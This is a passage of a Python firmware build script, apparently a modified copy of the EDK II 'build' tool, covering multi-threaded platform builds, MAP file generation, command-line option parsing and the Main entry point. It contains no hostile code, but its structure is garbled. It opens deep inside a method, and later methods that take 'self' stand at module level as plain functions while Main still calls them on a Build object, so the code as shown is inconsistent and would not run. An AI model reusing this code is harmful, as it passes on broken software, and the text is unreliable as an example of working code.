                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)

                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))

            MakeContiue = time.time()
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            self.MakeTime += int(round((time.time() - MakeContiue)))
            if BuildTask.HasError():
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)

            self.BuildReport.AddPlatformReport(Wa, MaList)
            if MaList == []:
                EdkLogger.error(
                            'build',
                            BUILD_ERROR,
                            "Module for [%s] is not a component of active platform."\
                            " Please make sure that the ARCH and inf file path are"\
                            " given in the same as in [%s]" % \
                                (', '.join(Wa.ArchList), self.PlatformFile),
                            ExtraData=self.ModuleFile
                            )
            # Create MAP file when Load Fix Address is enabled.
            if self.Target == "fds" and self.Fdf:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        # BUGFIX: corrected 'platorm' typo in the error message.
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                #
                # Get Module List
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma

                MapBuffer = StringIO()
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                #
                # create FDS again for the updated EFI image
                #
                GenFdsStart = time.time()
                self._Build("fds", Wa)
                self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Create MAP file for all platform FVs after GenFds.
                #
                self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile(MapBuffer, Wa)
def _GenFfsCmd(self):
    """Invert GenFds' FFS command table.

    GenFds.GenFfsMakefile returns a mapping of command -> (Inf, Arch);
    build this into the reverse mapping (Inf, Arch) -> set of commands,
    which is what makefile generation consumes.
    """
    CmdSetDict = defaultdict(set)
    GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, self.ArchList, GlobalData)
    for FfsCmd, InfArchKey in GenFfsDict.items():
        CmdSetDict[InfArchKey].add(FfsCmd)
    return CmdSetDict
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
    """Build the active platform in multi-thread mode.

    Generates AutoGen code/makefiles per architecture, feeds module make
    units to the BuildTask scheduler, waits for completion, then runs
    GenFds and emits the fixed-address MAP file when applicable.
    """
    # BUGFIX: text buffer for the address map — was BytesIO('') which
    # raises TypeError under Python 3 and cannot accept the str writes.
    from io import StringIO
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            Wa.CreateMakeFile(False)

            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd()

            # multi-thread exit flag
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                if Pa is None:
                    continue
                ModuleList = []
                for Inf in Pa.Platform.Modules:
                    ModuleList.append(Inf)
                # Add the INF only list in FDF
                if GlobalData.gFdfParser is not None:
                    for InfName in GlobalData.gFdfParser.Profile.InfList:
                        Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
                        if Inf in Pa.Platform.Modules:
                            continue
                        ModuleList.append(Inf)
                for Module in ModuleList:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)

                    if Ma is None:
                        continue
                    if Ma.CanSkipbyHash():
                        self.HashSkipModules.append(Ma)
                        continue

                    # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                    if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                        # for target which must generate AutoGen code and makefile
                        if not self.SkipAutoGen or self.Target == 'genc':
                            Ma.CreateCodeFile(True)
                        if self.Target == "genc":
                            continue

                        if not self.SkipAutoGen or self.Target == 'genmake':
                            if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
                                Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
                                del CmdListDict[Module.File, Arch]
                            else:
                                Ma.CreateMakeFile(True)
                        if self.Target == "genmake":
                            continue
                    self.BuildModules.append(Ma)
                self.Progress.Stop("done!")
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    # Generate build task for the module
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)

                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))

            MakeContiue = time.time()
            #
            # Save temp tables to a TmpTableDict.
            #
            for Key in Wa.BuildDatabase._CACHE_:
                if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
                    if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
                        TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
            #
            #
            # All modules have been put in build tasks queue. Tell task scheduler
            # to exit if all tasks are completed
            #
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            self.MakeTime += int(round((time.time() - MakeContiue)))
            #
            # Check for build error, and raise exception if one
            # has been signaled.
            #
            if BuildTask.HasError():
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)

            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        # BUGFIX: corrected 'platorm' typo in the error message.
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                #
                # Get Module List
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma
                #
                # Rebase module to the preferred memory address before GenFds
                #
                MapBuffer = StringIO()
                if self.LoadFixAddress != 0:
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)

                if self.Fdf:
                    #
                    # Generate FD image if there's a FDF file found
                    #
                    GenFdsStart = time.time()
                    LaunchCommand(Wa.GenFdsCommand, os.getcwd())
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                    self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
    """Generate GuidedSectionTools.txt in each FV directory.

    Scans tools_def.txt for *_GUID attributes matching the current
    TARGET_TOOLCHAIN_ARCH prefix, resolves each tool's *_PATH entry to a
    full path, and writes one 'guid toolname path' line per GUIDed tool.
    """
    for BuildTarget in self.BuildTargetList:
        for ToolChain in self.ToolChainList:
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag
                    )
            FvDir = Wa.FvDir
            if not os.path.exists(FvDir):
                continue

            for Arch in self.ArchList:
                # Build up the list of supported architectures for this build
                prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)

                # Look through the tool definitions for GUIDed tools
                guidAttribs = []
                # BUGFIX: dict.iteritems() does not exist under Python 3;
                # use items() instead.
                for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.items():
                    if attrib.upper().endswith('_GUID'):
                        split = attrib.split('_')
                        thisPrefix = '_'.join(split[0:3]) + '_'
                        if thisPrefix == prefix:
                            guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
                            guid = guid.lower()
                            toolName = split[3]
                            path = '_'.join(split[0:4]) + '_PATH'
                            path = self.ToolDef.ToolsDefTxtDictionary[path]
                            path = self.GetFullPathOfTool(path)
                            guidAttribs.append((guid, toolName, path))

                # Write out GuidedSecTools.txt
                toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
                # 'with' ensures the file handle is closed (was left open).
                with open(toolsFile, 'wt') as toolsFileHandle:
                    for guidedSectionTool in guidAttribs:
                        print(' '.join(guidedSectionTool), file=toolsFileHandle)
## Returns the full path of the tool.
#
def GetFullPathOfTool(self, tool):
    """Resolve *tool* to a real filesystem path.

    If *tool* already names an existing path it is canonicalized with
    realpath. Otherwise each directory on the PATH environment variable is
    searched in order. When nothing matches, the input name is returned
    unchanged so the caller can still attempt to run it.
    """
    if os.path.exists(tool):
        return os.path.realpath(tool)
    # Fall back to searching the PATH environment variable.
    for SearchDir in os.environ['PATH'].split(os.pathsep):
        Candidate = os.path.join(SearchDir, tool)
        if os.path.exists(Candidate):
            return os.path.realpath(Candidate)
    # Not found anywhere: hand the original name back unchanged.
    return tool
## Launch the module or platform build
#
def Launch(self):
    """Entry point: dispatch to a module build or a platform build.

    Platform builds use the multi-threaded path only when spawn mode is on
    and the target is a full build (''/'all'); module builds are always
    single-threaded. A 'cleanall' target additionally closes the workspace
    database and removes its directory.
    """
    if self.ModuleFile:
        # Module builds never spawn worker threads.
        self.SpawnMode = False
        self._BuildModule()
    else:
        if self.SpawnMode and self.Target in ["", "all"]:
            self._MultiThreadBuildPlatform()
        else:
            self.SpawnMode = False
            self._BuildPlatform()
        self.CreateGuidedSectionToolsFile()

    if self.Target == 'cleanall':
        self.Db.Close()
        RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
    """Emit the as-built INF for every module processed in this pass.

    Freshly built modules get a normal as-built INF; hash-skipped modules
    are regenerated from cache (CreateAsBuiltInf(True)). Both work lists
    are drained afterwards so the next pass starts empty.
    """
    for BuiltModule in self.BuildModules:
        BuiltModule.CreateAsBuiltInf()
    for CachedModule in self.HashSkipModules:
        CachedModule.CreateAsBuiltInf(True)
    self.BuildModules = []
    self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
    """Clean-up after a build error.

    Temporarily raises the log level to ERROR so the teardown is quiet,
    aborts the progress indicator and (in spawn mode) any outstanding
    build tasks, then restores the previous log level.
    """
    PreviousLevel = EdkLogger.GetLevel()
    EdkLogger.SetLevel(EdkLogger.ERROR)
    Utils.Progressor.Abort()
    if self.SpawnMode == True:
        BuildTask.Abort()
    EdkLogger.SetLevel(PreviousLevel)
def DumpBuildData(self):
    """Persist the timestamp and dependency caches next to the workspace DB."""
    CacheDir = os.path.dirname(GlobalData.gDatabasePath)
    Utils.CreateDirectory(CacheDir)
    # Dump both in-memory caches under their canonical file names.
    for CacheData, FileName in (
            (Utils.gFileTimeStampCache, "gFileTimeStampCache"),
            (Utils.gDependencyDatabase, "gDependencyDatabase"),
            ):
        Utils.DataDump(CacheData, os.path.join(CacheDir, FileName))
def RestoreBuildData(self):
    """Reload the timestamp and dependency caches dumped by DumpBuildData.

    Each cache is only restored when it is still empty in memory and its
    dump file exists; a failed restore (None) falls back to an empty dict.
    """
    CacheDir = os.path.dirname(GlobalData.gDatabasePath)
    for CacheName in ("gFileTimeStampCache", "gDependencyDatabase"):
        CachePath = os.path.join(CacheDir, CacheName)
        if getattr(Utils, CacheName) == {} and os.path.isfile(CachePath):
            setattr(Utils, CacheName, Utils.DataRestore(CachePath))
            if getattr(Utils, CacheName) is None:
                setattr(Utils, CacheName, {})
def ParseDefines(DefineList=None):
    """Convert a list of 'NAME[=VALUE]' macro definitions into a dict.

    A bare NAME maps to "TRUE"; NAME=VALUE maps to VALUE with surrounding
    whitespace stripped. Macro names must match GlobalData's
    [A-Z][A-Z0-9_]* pattern, otherwise a build error is raised.

    @param DefineList  list of definition strings, or None for no defines
    @retval dict of macro name -> value
    """
    # BUGFIX: default was the mutable literal [] (shared across calls);
    # None is equivalent here since the None case is already handled below.
    DefineDict = {}
    if DefineList is not None:
        for Define in DefineList:
            DefineTokenList = Define.split("=", 1)
            if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
                EdkLogger.error('build', FORMAT_INVALID,
                                "The macro name must be in the pattern [A-Z][A-Z0-9_]*",
                                ExtraData=DefineTokenList[0])

            if len(DefineTokenList) == 1:
                DefineDict[DefineTokenList[0]] = "TRUE"
            else:
                DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
    return DefineDict
# Registry of optparse Option objects already seen on the command line;
# SingleCheckCallback consults it to reject duplicated single-use options.
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
    """optparse callback enforcing that an option appears at most once.

    On first occurrence the value is stored on parser.values and the option
    is recorded in the module-level gParamCheck list; any repeat occurrence
    aborts argument parsing with an error.
    """
    if option in gParamCheck:
        parser.error("Option %s only allows one instance in command line!" % option)
    else:
        setattr(parser.values, option.dest, value)
        gParamCheck.append(option)
def LogBuildTime(Time):
    """Format a build duration (seconds) as 'HH:MM:SS[, N day(s)]'.

    Returns None for a falsy duration (0 or None), mirroring the callers'
    expectation that an unset timer produces no log line.
    """
    if not Time:
        return None
    Broken = time.gmtime(Time)
    Formatted = time.strftime("%H:%M:%S", Broken)
    # gmtime's day-of-year starts at 1; anything beyond day 1 is whole days.
    ExtraDays = Broken.tm_yday - 1
    if ExtraDays > 0:
        Formatted = Formatted + ", %d day(s)" % ExtraDays
    return Formatted
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
    """Build the command-line parser for the build tool and parse sys.argv.

    Returns:
        (Opt, Args): Opt is the optparse.Values object holding all parsed
        options; Args is the list of positional build targets.
    """
    Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
    # What to build: architectures, platform DSC, module INF, target, toolchain.
    # Options wired to SingleCheckCallback may appear at most once.
    Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
        help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
    Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
        help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
    Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
        help="Build the module specified by the INF file name argument.")
    Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
                      action="append")
    Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
        help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
    Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
        help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
    Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
        help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
             "processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
    # Flash-image related options: FDF file and the FD/FV/Capsule images to emit.
    Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
        help="The name of the FDF file to use, which overrides the setting in the DSC file.")
    Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
        help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
    Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
        help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
    Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
        help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
    # Build behavior switches.
    Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
    Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
    Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
    Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
    # Logging / verbosity.
    Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
    Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
        help="Make use of silent mode of (n)make.")
    Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
    Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
                                                                              "including library instances selected, final dependency expression, "\
                                                                              "and warning messages, etc.")
    Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
    Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
    # Build report generation.
    Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
    Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
        help="Flags that control the type of build report to generate.  Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER].  "\
             "To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
    Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
        help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
             "This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
             "will override the setting in [BuildOptions] section of platform DSC.")
    # Caching / misc.
    Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
    Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
    Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
    Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
    Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
    Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
    Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
    Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
    Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
    Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
    (Opt, Args) = Parser.parse_args()
    return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
    """Tool entrance: dispatch per the command line options.

    Returns 0 on success, or a tool error code (FatalError code,
    FORMAT_INVALID, ABORT_ERROR, CODE_ERROR) on failure.
    """
    StartTime = time.time()

    # Initialize log system
    EdkLogger.Initialize()
    GlobalData.gCommand = sys.argv[1:]
    #
    # Parse the options and args
    #
    (Option, Target) = MyOptionParser()
    GlobalData.gOptions = Option
    GlobalData.gCaseInsensitive = Option.CaseInsensitive

    # Set log level (verbose > quiet > explicit debug level > default INFO).
    if Option.verbose is not None:
        EdkLogger.SetLevel(EdkLogger.VERBOSE)
    elif Option.quiet is not None:
        EdkLogger.SetLevel(EdkLogger.QUIET)
    elif Option.debug is not None:
        EdkLogger.SetLevel(Option.debug + 1)
    else:
        EdkLogger.SetLevel(EdkLogger.INFO)
    if Option.LogFile is not None:
        EdkLogger.SetLogFile(Option.LogFile)
    if Option.WarningAsError == True:
        EdkLogger.SetWarningAsError()
    if platform.platform().find("Windows") >= 0:
        GlobalData.gIsWindows = True
    else:
        GlobalData.gIsWindows = False

    EdkLogger.quiet("Build environment: %s" % platform.platform())
    EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
    ReturnCode = 0
    MyBuild = None
    BuildError = True
    try:
        # Exactly zero or one positional target is accepted; default is "all".
        if len(Target) == 0:
            Target = "all"
        elif len(Target) >= 2:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
                            ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
        else:
            Target = Target[0].lower()
            if Target not in gSupportedTarget:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
                                ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
        #
        # Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
        #
        CheckEnvVariable()
        GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))

        Workspace = os.getenv("WORKSPACE")
        #
        # Get files real name in workspace dir
        #
        GlobalData.gAllFiles = Utils.DirCache(Workspace)

        WorkingDirectory = os.getcwd()
        # When no module was given, auto-pick a single INF from the current
        # directory; more than one is ambiguous and is an error.
        if not Option.ModuleFile:
            FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
            FileNum = len(FileList)
            if FileNum >= 2:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
                                ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
            elif FileNum == 1:
                Option.ModuleFile = NormFile(FileList[0], Workspace)

        # Normalize the module/platform/FDF paths to be workspace-relative
        # PathClass objects, validating the file extensions where applicable.
        if Option.ModuleFile:
            if os.path.isabs (Option.ModuleFile):
                if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
                    Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
            Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
            ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)

        if Option.PlatformFile is not None:
            if os.path.isabs (Option.PlatformFile):
                if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
                    Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
            Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)

        if Option.FdfFile is not None:
            if os.path.isabs (Option.FdfFile):
                if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
                    Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
            Option.FdfFile = PathClass(Option.FdfFile, Workspace)
            ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)

        if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
            EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")

        MyBuild = Build(Target, Workspace, Option)
        GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
        if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
            MyBuild.Launch()
        # Drop temp tables to avoid database locked.
        for TmpTableName in TmpTableDict:
            SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
            TmpTableDict[TmpTableName].execute(SqlCommand)
        #MyBuild.DumpBuildData()
        #
        # All job done, no error found and no exception raised
        #
        BuildError = False
    except FatalError as X:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = X.args[0]
    except Warning as X:
        # error from Fdf parser
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        else:
            EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
        ReturnCode = FORMAT_INVALID
    except KeyboardInterrupt:
        ReturnCode = ABORT_ERROR
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
    except:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()

        # try to get the meta-file from the object causing exception
        Tb = sys.exc_info()[-1]
        MetaFile = GlobalData.gProcessingFile
        while Tb is not None:
            # Walk the traceback for the innermost object carrying a MetaFile,
            # so the error message can name the file being processed.
            if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
                MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
            Tb = Tb.tb_next
        EdkLogger.error(
                    "\nbuild",
                    CODE_ERROR,
                    "Unknown fatal error when processing [%s]" % MetaFile,
                    ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
                    RaiseError=False
                    )
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = CODE_ERROR
    finally:
        Utils.Progressor.Abort()
        Utils.ClearDuplicatedInf()

    if ReturnCode == 0:
        try:
            MyBuild.LaunchPostbuild()
            Conclusion = "Done"
        except:
            Conclusion = "Failed"
    elif ReturnCode == ABORT_ERROR:
        Conclusion = "Aborted"
    else:
        Conclusion = "Failed"
    FinishTime = time.time()
    BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
    BuildDurationStr = ""
    if BuildDuration.tm_yday > 1:
        BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
    else:
        BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
